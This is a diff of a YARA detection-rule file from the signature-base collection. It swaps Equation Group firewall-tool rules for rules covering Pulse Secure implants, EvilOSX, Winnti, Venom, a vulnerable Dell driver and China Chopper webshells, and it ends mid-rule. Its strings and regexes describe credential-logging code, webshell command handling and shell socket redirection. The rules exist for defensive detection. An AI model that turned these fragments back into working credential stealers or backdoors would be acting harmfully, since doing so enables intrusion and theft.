-		$s3 = ".got_loader" fullword ascii
-		$s4 = "xtractdata" fullword ascii
-		$s5 = "KEEPGOING" fullword ascii
+		$s1 = /open[\x09\x20]{0,32}\(\*STDOUT[\x09\x20]{0,32},[\x09\x20]{0,32}[\x22\x27]>&CLIENT[\x22\x27]\)/
+		$s2 = /open[\x09\x20]{0,32}\(\*STDERR[\x09\x20]{0,32},[\x09\x20]{0,32}[\x22\x27]>&CLIENT[\x22\x27]\)/
+		$s3 = /socket[\x09\x20]{0,32}\(SERVER[\x09\x20]{0,32},[\x09\x20]{0,32}PF_UNIX[\x09\x20]{0,32},[\x09\x20]{0,32}SOCK_STREAM[\x09\x20]{0,32},[\x09\x20]{0,32}0[\x09\x20]{0,32}\)[\x09\x20]{0,32};\s{0,128}unlink/
+		$s4 = /bind[\x09\x20]{0,32}\([\x09\x20]{0,32}SERVER[\x09\x20]{0,32},[\x09\x20]{0,32}sockaddr_un\(/
+		$s5 = /listen[\x09\x20]{0,32}\([\x09\x20]{0,32}SERVER[\x09\x20]{0,32},[\x09\x20]{0,32}SOMAXCONN[\x09\x20]{0,32}\)[\x09\x20]{0,32};/
+		$s6 = /my[\x09\x20]{1,32}\$\w{1,64}[\x09\x20]{0,32}=[\x09\x20]{0,32}fork\([\x09\x20]{0,32}\)[\x09\x20]{0,32};\s{1,128}if[\x09\x20]{0,32}\([\x09\x20]{0,32}\$\w{1,64}[\x09\x20]{0,32}==[\x09\x20]{0,32}0[\x09\x20]{0,32}\)[\x09\x20]{0,32}\{\s{1,128}exec\(/
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 40KB and all of them )
+		all of them
 }
-rule SIGNATURE_BASE_EQGRP_Extrabacon
+rule SIGNATURE_BASE_FE_APT_Trojan_PL_RADIALPULSE_1
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file extrabacon_1.1.0.1.py"
-		author = "Florian Roth (Nextron Systems)"
-		id = "79b998ef-e548-5038-b8ad-da1abf362e7f"
-		date = "2016-08-16"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
+		id = "1fab6d2f-96e8-5def-a93e-2bddd04e7ec8"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L708-L725"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L173-L190"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1a010d5e6324715f8e1bf29e957c365fabd2986fece53aaea23bba8ee59bd808"
+		hash = "d72daafedf41d484f7f9816f7f076a9249a6808f1899649b7daa22c0447bb37b"
+		logic_hash = "d65a466cc15214d8e26597588c039a6b9fb4637ef8f3b1ebea27f016fbd5cba8"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "59d60835fe200515ece36a6e87e642ee8059a40cb04ba5f4b9cce7374a3e7735"
 
 	strings:
-		$x1 = "To disable password checking on target:" fullword ascii
-		$x2 = "[-] target is running" fullword ascii
-		$x3 = "[-] problem importing version-specific shellcode from" fullword ascii
-		$x4 = "[+] importing version-specific shellcode" fullword ascii
-		$s5 = "[-] unsupported target version, abort" fullword ascii
+		$s1 = "->getRealmInfo()->{name}"
+		$s2 = /open\(\*fd,[\x09\x20]{0,32}[\x22\x27]>>/
+		$s3 = /syswrite\(\*fd,[\x09\x20]{0,32}[\x22\x27]realm=\$/
+		$s4 = /syswrite\(\*fd,[\x09\x20]{0,32}[\x22\x27]username=\$/
+		$s5 = /syswrite\(\*fd,[\x09\x20]{0,32}[\x22\x27]password=\$/
 
 	condition:
-		1 of them
+		(@s1 [ 1 ] < @s2 [ 1 ] ) and ( @s2 [ 1 ] < @s3 [ 1 ] ) and $s4 and $s5
 }
-rule SIGNATURE_BASE_EQGRP_Sploit_Py
+rule SIGNATURE_BASE_FE_APT_Trojan_PL_RADIALPULSE_2
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file sploit.py"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9f403965-5fb1-55b2-bef6-65c18e08e58f"
-		date = "2016-08-16"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
+		id = "dc941935-aec7-54b6-a278-f1453b9785df"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L727-L742"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L191-L208"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "874eaffcbc191951db39ba6c85e8c80b83b0df8d33136b6cdcdefcb28e596474"
+		hash = "4a2a7cbc1c8855199a27a7a7b51d0117"
+		logic_hash = "4ade993176c918ec23e99fc585e9ab14d9f9e93a7eca00f2c3b0ebbd13d6ec5b"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0316d70a5bbf068a7fc791e08e816015d04ec98f088a7ff42af8b9e769b8d1f6"
 
 	strings:
-		$x1 = "the --spoof option requires 3 or 4 fields as follows redir_ip" ascii
-		$x2 = "[-] timeout waiting for response - target may have crashed" fullword ascii
-		$x3 = "[-] no response from health check - target may have crashed" fullword ascii
+		$s1 = "open(*fd,"
+		$s2 = "syswrite(*fd,"
+		$s3 = "close(*fd);"
+		$s4 = /open\(\*fd,[\x09\x20]{0,32}[\x22\x27]>>\/tmp\/[\w.]{1,128}[\x22\x27]\);[\x09\x20]{0,32}syswrite\(\*fd,[\x09\x20]{0,32}/
+		$s5 = /syswrite\(\*fd,[\x09\x20]{0,32}[\x22\x27][\w]{1,128}=\$\w{1,128} ?[\x22\x27],[\x09\x20]{0,32}5000\)/
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_EQGRP_Uninstallpbd
+rule SIGNATURE_BASE_FE_APT_Trojan_PL_RADIALPULSE_3
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file uninstallPBD.bat"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0153cb2a-a0de-51f9-80c2-22136d56f16d"
-		date = "2016-08-16"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
+		id = "8a597521-c873-5bcc-85e6-5a0a061fffb7"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L744-L759"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L209-L226"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "51be8a491a1e228dfc6156a86e9f2ffc923c39d0649bbc031ea1bafe1af22a45"
+		hash = "4a2a7cbc1c8855199a27a7a7b51d0117"
+		logic_hash = "025308591e058de284f949fd4f788e4a4f46bb2f6c0e1161237f1f811d8179ba"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "692fdb449f10057a114cf2963000f52ce118d9a40682194838006c66af159bd0"
 
 	strings:
-		$s1 = "memset 00e9a05c 4 38845b88" fullword ascii
-		$s2 = "_hidecmd" ascii
-		$s3 = "memset 013abd04 1 0d" fullword ascii
+		$s1 = "open(*fd,"
+		$s2 = "syswrite(*fd,"
+		$s3 = "close(*fd);"
+		$s4 = /open\(\*fd,[\x09\x20]{0,32}[\x22\x27]>>\/tmp\/dsstartssh\.statementcounters[\x22\x27]\);[\x09\x20]{0,32}syswrite\(\*fd,[\x09\x20]{0,32}/
+		$s5 = /syswrite\(\*fd,[\x09\x20]{0,32}[\x22\x27][\w]{1,128}=\$username ?[\x22\x27],[\x09\x20]{0,32}\d{4}\)/
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_EQGRP_BICECREAM : FILE
+rule SIGNATURE_BASE_FE_APT_Backdoor_Linux32_SLOWPULSE_1 : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file BICECREAM-2140"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a10819ae-db48-5d30-8e2e-2e4fe33e005b"
-		date = "2016-08-16"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
+		id = "dd35257f-5b6f-55a6-a709-873ded1f4b72"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L761-L782"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L227-L244"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "adaa6b7d4bf9e6f95fbae781382e72afc07993582473cbee7139a93df0fe3283"
+		hash = "cd09ec795a8f4b6ced003500a44d810f49943514e2f92c81ab96c33e1c0fbd68"
+		logic_hash = "c1d92ea4ed8e5934c8356e1e52092935c53a138e454026737448f7f523ea06be"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4842076af9ba49e6dfae21cf39847b4172c06a0bd3d2f1ca6f30622e14b77210"
 
 	strings:
-		$s1 = "Could not connect to target device: %s:%d. Please check IP address." fullword ascii
-		$s2 = "command data size is invalid for an exec cmd" fullword ascii
-		$s3 = "A script was specified but target is not a PPC405-based NetScreen (NS5XT, NS25, and NS50). Executing scripts is supported but ma" ascii
-		$s4 = "Execute 0x%08x with args (%08x, %08x, %08x, %08x): [y/n]" fullword ascii
-		$s5 = "Execute 0x%08x with args (%08x, %08x, %08x): [y/n]" fullword ascii
-		$s6 = "[%d] Execute code." fullword ascii
-		$s7 = "Execute 0x%08x with args (%08x): [y/n]" fullword ascii
-		$s8 = "dump_value_LHASH_DOALL_ARG" fullword ascii
-		$s9 = "Eggcode is complete. Pass execution to it? [y/n]" fullword ascii
+		$sb1 = {FC b9 [4] e8 00 00 00 00 5? 8d b? [4] 8b}
+		$sb2 = {f3 a6 0f 85 [4] b8 03 00 00 00 5? 5? 5?}
+		$sb3 = {9c 60 e8 00 00 00 00 5? 8d [5] 85 ?? 0f 8?}
+		$sb4 = {89 13 8b 51 04 89 53 04 8b 51 08 89 53 08}
+		$sb5 = {8d [5] b9 [4] f3 a6 0f 8?}
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 5000KB and 2 of them ) or ( 5 of them )
+		(( uint32( 0 ) == 0x464c457f ) and ( uint8( 4 ) == 1 ) ) and all of them
 }
-rule SIGNATURE_BASE_EQGRP_Create_Http_Injection : FILE
+rule SIGNATURE_BASE_FE_APT_Webshell_PL_STEADYPULSE_1
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file create_http_injection.py"
-		author = "Florian Roth (Nextron Systems)"
-		id = "92b6dad0-c7d8-5522-8fc1-fbd0aae00960"
-		date = "2016-08-16"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
+		id = "49457fbb-9288-565f-909d-e8228c21c1e4"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L784-L802"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L265-L284"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3a2ee46c6fec1b7a501e8c0e2963d4873ede89d192d0f4701d051f782e8ece99"
+		hash = "168976797d5af7071df257e91fcc31ce1d6e59c72ca9e2f50c8b5b3177ad83cc"
+		logic_hash = "a0e3ebdd02ccf5cc8fc0a83c1d0224aed45dc5094eb85bd855e5b74b34e3aaaf"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "de52f5621b4f3896d4bd1fb93ee8be827e71a2b189a9f8552b68baed062a992d"
+		tags = ""
 
 	strings:
-		$x1 = "required by SECONDDATE" fullword ascii
-		$s1 = "help='Output file name (optional). By default the resulting data is written to stdout.')" fullword ascii
-		$s2 = "data = '<html><body onload=\"location.reload(true)\"><iframe src=\"%s\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"" ascii
-		$s3 = "version='%prog 1.0'," fullword ascii
-		$s4 = "usage='%prog [ ... options ... ] url'," fullword ascii
+		$s1 = "parse_parameters"
+		$s2 = "s/\\+/ /g"
+		$s3 = "s/%(..)/pack("
+		$s4 = "MIME::Base64::encode($"
+		$s5 = "$|=1;"
+		$s6 = "RC4("
+		$s7 = "$FORM{'cmd'}"
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 3KB and ( $x1 or 2 of them ) ) or ( all of them )
+		all of them
 }
-rule SIGNATURE_BASE_EQGRP_BFLEA_2201 : FILE
+rule SIGNATURE_BASE_OSX_Backdoor_Evilosx : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file BFLEA-2201.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7dfdc2a2-73d1-5eba-8936-ed14b17495c5"
-		date = "2016-08-16"
+		description = "EvilOSX MacOS/OSX backdoor"
+		author = "John Lambert @JohnLaTwC"
+		id = "6940e355-53d2-51e3-afd0-13303a311e9a"
+		date = "2018-02-23"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L804-L823"
+		reference = "https://github.com/Marten4n6/EvilOSX, https://twitter.com/JohnLaTwC/status/966139336436498432"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_osx_evilosx.yar#L1-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d0fd4d0ffe98856abed685c4b9ff770daba22aa16bd860440874fd94df2d54ea"
+		hash = "89e5b8208daf85f549d9b7df8e2a062e47f15a5b08462a4224f73c0a6223972a"
+		logic_hash = "393abf7cf74f8d079049cf8f0bdb3a79bf16185c80c43b823e19b67a9031aef6"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "15e8c743770e44314496c5f27b6297c5d7a4af09404c4aa507757e0cc8edc79e"
 
 	strings:
-		$s1 = ".got_loader" fullword ascii
-		$s2 = "LOADED" fullword ascii
-		$s3 = "readFlashHandler" fullword ascii
-		$s4 = "KEEPGOING" fullword ascii
-		$s5 = "flashRtnsPix6x.c" fullword ascii
-		$s6 = "fix_ip_cksum_incr" fullword ascii
-		$s7 = "writeFlashHandler" fullword ascii
+		$h1 = "#!/usr/bin/env"
+		$s0 = "import base64" fullword ascii
+		$s1 = "b64decode" fullword ascii
+		$x0 = "EvilOSX" fullword ascii
+		$x1 = "get_launch_agent_directory" fullword ascii
+		$enc_x0 = /(AHYAaQBsAE8AUwBYA|dmlsT1NY|RQB2AGkAbABPAFMAWA|RXZpbE9TW|UAdgBpAGwATwBTAFgA|V2aWxPU1)/ ascii
+		$enc_x1 = /(AGUAdABfAGwAYQB1AG4AYwBoAF8AYQBnAGUAbgB0AF8AZABpAHIAZQBjAHQAbwByAHkA|cAZQB0AF8AbABhAHUAbgBjAGgAXwBhAGcAZQBuAHQAXwBkAGkAcgBlAGMAdABvAHIAeQ|dldF9sYXVuY2hfYWdlbnRfZGlyZWN0b3J5|Z2V0X2xhdW5jaF9hZ2VudF9kaXJlY3Rvcn|ZwBlAHQAXwBsAGEAdQBuAGMAaABfAGEAZwBlAG4AdABfAGQAaQByAGUAYwB0AG8AcgB5A|ZXRfbGF1bmNoX2FnZW50X2RpcmVjdG9ye)/ ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 30KB and 5 of them ) or ( all of them )
+		uint32( 0 ) == 0x752f2123 and $h1 at 0 and filesize < 30KB and all of ( $s* ) and 1 of ( $x* ) or 1 of ( $enc_x* )
 }
-rule SIGNATURE_BASE_EQGRP_Bpfcreator_RHEL4 : FILE
+rule SIGNATURE_BASE_Winnti_Fonfig : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file BpfCreator-RHEL4"
+		description = "Winnti sample - file fonfig.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "476185f2-b093-5fb9-8604-891e96fe52a9"
-		date = "2016-08-16"
+		id = "ca3c186c-0286-5b9b-9585-7680336c8c3d"
+		date = "2017-01-25"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L825-L842"
+		reference = "https://goo.gl/VbvJtL"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_ms_report_201701.yar#L10-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8586425b13355170137d66fe8d52ed98982d7c5699b26a8c0132f107b4af43d8"
+		logic_hash = "715892268431bf76cf9bf0bdbeaf4129befdc590b5b2dcae479d95dfe77561a4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "bd7303393409623cabf0fcf2127a0b81fae52fe40a0d2b8db0f9f092902bbd92"
+		hash1 = "2c9882854a60c624ecf6b62b6c7cc7ed04cf4a29814aa5ed1f1a336854697641"
 
 	strings:
-		$s1 = "usage %s \"<tcpdump pcap string>\" <outfile>" fullword ascii
-		$s2 = "error reading dump file: %s" fullword ascii
-		$s3 = "truncated dump file; tried to read %u captured bytes, only got %lu" fullword ascii
-		$s4 = "%s: link-layer type %d isn't supported in savefiles" fullword ascii
-		$s5 = "DLT %d is not one of the DLTs supported by this device" fullword ascii
+		$s1 = "mciqtz.exe" fullword wide
+		$s2 = "knat9y7m" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 2000KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_EQGRP_Storefc
+rule SIGNATURE_BASE_Winnti_Nlaifsvc : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file StoreFc.py"
+		description = "Winnti sample - file NlaifSvc.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "48bbf5c9-e884-5126-93a2-d27650409882"
-		date = "2016-08-16"
+		id = "d2bfcad4-9762-5f2a-88cc-e8cdc648e710"
+		date = "2017-01-25"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L844-L859"
+		reference = "https://goo.gl/VbvJtL"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_ms_report_201701.yar#L26-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f07c3ef83808852f70fb5cbc4436d531675344ab74f83888cd70d987c3544cce"
+		logic_hash = "7268c79baf37174e04b391ae42cdd6014f17478c5b89d0c7b8042eb839324f87"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f155cce4eecff8598243a721389046ae2b6ca8ba6cb7b4ac00fd724601a56108"
+		hash1 = "964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5"
 
 	strings:
-		$x1 = "Usage: StoreFc.py --configFile=<path to xml file> --implantFile=<path to BinStore implant> [--outputFile=<file to write the conf" ascii
-		$x2 = "raise Exception, \"Must supply both a config file and implant file.\"" fullword ascii
-		$x3 = "This is wrapper for Store.py that FELONYCROWBAR will use. This" fullword ascii
+		$x1 = "cracked by ximo" ascii
+		$s1 = "Yqrfpk" fullword ascii
+		$s2 = "IVVTOC" fullword ascii
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 2 of them ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_EQGRP_Hexdump : FILE
+rule SIGNATURE_BASE_HKTL_Venom_LIB_Dec22 : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file hexdump.py"
-		author = "Florian Roth (Nextron Systems)"
-		id = "32a7d845-2fa3-5d8f-84e1-2c7f8d2ca8c8"
-		date = "2016-08-16"
+		description = "Detects Venom - a library that meant to perform evasive communication using stolen browser socket"
+		author = "Ido Veltzman, Florian Roth"
+		id = "b13b8a9c-52a4-53ac-817e-9f729fbf17c2"
+		date = "2022-12-17"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L861-L877"
+		reference = "https://github.com/Idov31/Venom"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_hktl_venom_lib.yar#L2-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ed36aa5a69296088bdd1db42e6561377294b7bd99c30104b9d4a618d899d7e9a"
+		logic_hash = "fa143946479a45b272d507c3aa2b17026bfdcbb4abefd833f95ff78537568ec1"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "95a9a6a8de60d3215c1c9f82d2d8b2640b42f5cabdc8b50bd1f4be2ea9d7575a"
 
 	strings:
-		$s1 = "def hexdump(x,lead=\"[+] \",out=sys.stdout):" fullword ascii
-		$s2 = "print >>out, \"%s%04x  \" % (lead,i)," fullword ascii
-		$s3 = "print >>out, \"%02X\" % ord(x[i+j])," fullword ascii
-		$s4 = "print >>out, sane(x[i:i+16])" fullword ascii
+		$x1 = "[ + ] Created detached hidden msedge process: " fullword ascii
+		$ss1 = "WS2_32.dll" fullword ascii
+		$ss2 = "WSASocketW" fullword ascii
+		$ss3 = "WSADuplicateSocketW" fullword ascii
+		$ss5 = "\\Device\\Afd" wide fullword
+		$sx1 = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe --no-startup-window" fullword wide
+		$sx2 = "[ + ] Data sent!" fullword ascii
+		$sx3 = "[ + ] Socket obtained!" fullword ascii
+		$op1 = { 4c 8b f0 48 3b c1 48 b8 ff ff ff ff ff ff ff 7f }
+		$op2 = { 48 8b cf e8 1c 34 00 00 48 8b 5c 24 30 48 8b c7 }
+		$op3 = { 48 8b da 48 8b f9 45 33 f6 48 85 c9 0f 84 34 01 }
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 1KB and 2 of ( $s* ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( ( 3 of ( $ss* ) and all of ( $op* ) ) or 2 of ( $sx* ) ) or $x1 or all of ( $sx* )
 }
-rule SIGNATURE_BASE_EQGRP_BBALL : FILE
+rule SIGNATURE_BASE_VULN_Dell_BIOS_Update_Driver_Dbutil_May21 : CVE_2021_21551 FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file BBALL_E28F6-2201.exe"
+		description = "Detects vulnerable DELL BIOS update driver that allows privilege escalation as reported in CVE-2021-21551 - DBUtil_2_3.Sys - note: it's usual location is in the C:\\Windows\\Temp folder"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bced11a2-fac4-58e5-a4a8-1c6d5fe418f9"
-		date = "2016-08-16"
+		id = "6d46866e-40fb-5fbf-b159-6bf688e638cb"
+		date = "2021-05-05"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L879-L898"
+		reference = "https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vul_dell_bios_upd_driver.yar#L2-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b02d17a13725b5215c89590abf77f960e79f9fd155c9ea4e9eb903710a7a375e"
-		score = 75
-		quality = 83
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "498fc9f20b938b8111adfa3ca215325f265a08092eefd5300c4168876deb7bf6"
+		logic_hash = "9cefb9fe28e818a3b0bc1c9ac570ddf2fac7ebf23408963656b7ec86d5bf3224"
+		score = 60
+		quality = 85
+		tags = "CVE-2021-21551, FILE"
+		hash1 = "0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5"
+		hash2 = "ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1"
 
 	strings:
-		$s1 = "Components/Modules/BiosModule/Implant/E28F6/../e28f640j3_asm.S" fullword ascii
-		$s2 = ".got_loader" fullword ascii
-		$s3 = "handler_readBIOS" fullword ascii
-		$s4 = "cmosReadByte" fullword ascii
-		$s5 = "KEEPGOING" fullword ascii
-		$s6 = "checksumAreaConfirmed.0" fullword ascii
-		$s7 = "writeSpeedPlow.c" fullword ascii
+		$s1 = "\\DBUtilDrv2" ascii
+		$s2 = "DBUtil_2_3.Sys" ascii fullword
+		$s3 = "[ Dell BIOS Utility Driver - " ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 40KB and 4 of ( $s* ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE_EQGRP_BARPUNCH_BPICKER : FILE
+rule SIGNATURE_BASE_Chinachopper_Generic : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - from files BARPUNCH-3110, BPICKER-3100"
+		description = "China Chopper Webshells - PHP and ASPX"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7e88ba9d-1f15-533a-b388-a2a027ddb07c"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L902-L921"
+		id = "2473cef1-88cf-5b76-a87a-2978e6780b4f"
+		date = "2015-03-10"
+		modified = "2022-10-27"
+		reference = "https://www.fireeye.com/content/dam/legacy/resources/pdfs/fireeye-china-chopper-report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_webshell_chinachopper.yar#L2-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f5d0cc881bedad736a90109933da8dbd32c4435aa255676c68ae3541bbb61e74"
+		logic_hash = "34cb81b077d6dae5b4565001b2ab28897c6c554f00aa102601fb9c416c6c0f09"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc"
-		hash2 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f"
 
 	strings:
-		$x1 = "--cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s --lptimeout %u" fullword ascii
-		$x2 = "%s -c <cmdtype> -l <lp> -i <implant> -k <ikey> -s <port> -d <port> [operation] [options]" fullword ascii
-		$x3 = "* [%lu] 0x%x is marked as stateless (the module will be persisted without its configuration)" fullword ascii
